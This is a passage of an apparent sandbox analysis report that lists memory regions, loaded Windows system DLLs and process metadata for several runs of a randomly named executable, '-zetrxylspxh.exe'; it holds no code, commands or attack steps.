0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 6701 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 6702 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6703 start_va = 0x780000 end_va = 0x907fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 6704 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 228 os_tid = 0xe8 Thread: id = 235 os_tid = 0xe2c Thread: id = 265 os_tid = 0xe2c Process: id = "67" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xb8b2000" os_pid = "0xe48" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6331 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6332 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6333 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6334 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6335 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6336 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6337 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6338 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6339 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6340 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 6341 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6342 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6343 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6344 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6345 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6346 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 6404 start_va = 0x5f0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 6405 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6406 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6407 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6424 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6425 start_va = 0x440000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 6426 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6427 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6588 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6589 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 6590 start_va = 0x600000 end_va = 0x6bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6591 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 6592 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 6593 start_va = 0x560000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 6594 start_va = 0x6c0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 6595 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 6596 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6597 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 6598 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 6599 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 6600 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6601 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6602 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 6603 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6604 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6605 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6606 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 6607 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 6936 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 6937 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 6954 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 6955 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 6956 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 6957 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 6958 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6959 start_va = 0x7c0000 end_va = 0x947fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 6960 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 229 os_tid = 0x1308 Thread: id = 242 os_tid = 0xa44 Process: id = "68" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0x695b6000" os_pid = "0x8a8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6358 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6359 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6360 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6361 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6362 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6363 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6364 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6365 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6366 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6367 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 6368 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6369 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6370 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6371 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6372 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6373 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 6493 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6494 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6495 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6496 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6497 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6498 start_va = 0x590000 end_va = 0x86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 6499 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6500 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6776 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6777 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 6778 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6779 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 6780 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 6781 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 6782 start_va = 0x590000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 6783 start_va = 0x770000 end_va = 0x86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 6784 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 6785 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6786 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 6787 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 6788 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 6789 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7181 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7182 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7183 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7184 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7185 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7186 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7187 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7188 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 7189 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 7190 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 7191 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 7192 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 7193 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 7194 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7195 start_va = 0x870000 end_va = 0x9f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 7196 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 231 os_tid = 0x1324 Thread: id = 250 os_tid = 0x1074 Process: id = "69" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0x55cbb000" os_pid = "0x1c4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6386 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6387 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6388 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6389 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6390 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6391 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6392 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6393 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6394 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6395 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 6396 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 